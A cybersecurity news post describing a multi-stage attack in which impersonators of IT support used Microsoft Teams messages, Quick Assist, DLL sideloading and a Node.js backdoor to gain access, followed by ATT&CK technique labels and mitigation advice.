Sophisticated Multi-Stage Attack Leveraging Microsoft Teams

Written By Ago Poolakese

A sophisticated multi-stage attack has emerged, where threat actors exploit Microsoft Teams to deliver malicious payloads, establishing persistence and remote access to corporate networks. This new attack vector takes advantage of Teams' perceived security as an internal business application, allowing attackers to bypass traditional email security controls.

Incident Documentation

Security firm Ontinue’s Cyber Defence Centre recently documented an incident in which attackers compromised systems using a combination of social engineering, vishing (voice phishing), and legitimate remote access tools.

Attack Methodology

The attack began with the threat actor sending a Microsoft Teams message to the target containing a malicious PowerShell command. Investigators noted, “The actor transmitted a PowerShell command directly via the Teams message and also utilized the QuickAssist remote tool to gain access to the target device remotely.” This initial access phase exploited users’ trust in team communications, particularly when the threat actor impersonated IT support personnel.

The observed PowerShell command executed from the target endpoint facilitated the download of first-stage malware. Upon execution, the attack leveraged DLL sideloading techniques with a legitimate signed TeamViewer.exe binary loading a malicious TV.dll module. This advanced technique helps bypass security controls as the initial executable appears legitimate and properly signed.

JavaScript Backdoor Establishes Command & Control

Analysis of the second-stage payload revealed a JavaScript-based backdoor executed via Node.js (renamed to hcmd.exe), which established a persistent connection to the attackers’ command-and-control infrastructure. The backdoor included socket capabilities for remote connections and command execution.

This attack pattern aligns with techniques attributed to threat actor Storm-1811, known for leveraging vishing, Quick Assist, and social engineering tactics. Microsoft has observed similar campaigns since mid-April 2024, in which attackers bombard victims with spam emails before calling while impersonating IT support staff. Security researchers at Trend Micro have also documented comparable attacks distributing DarkGate malware through Teams voice calls, where victims were instructed to download remote access applications like AnyDesk.

Detection and Mitigation

The attack chain utilizes several MITRE ATT&CK techniques, including:

  • T1105 – Ingress Tool Transfer

  • T1656 – Impersonation

  • T1219 – Remote Access Software

  • T1218 – Signed Binary Proxy Execution

  • T1197 – BITS Jobs

Security experts recommend that organizations block or uninstall Quick Assist and similar remote monitoring tools if they are not required. Additionally, organizations should consider disabling external connections to their Teams environment to prevent such attacks. Microsoft has announced plans to implement alerts in Quick Assist to warn users of potential tech support scams.

As collaboration tools like Microsoft Teams become more prevalent, organizations must recognize the risks associated with these tools. Implementing robust security measures and providing user training are essential to maintaining a secure environment.


https://cybersecuritynews.com/hackers-leverage-microsoft-teams/

Ago Poolakese
Previous

North Korean IT Workers Targeting European Companies to Compromise Corporate Systems
Next

Protecting High-Profile Travelers: Mobile Device Security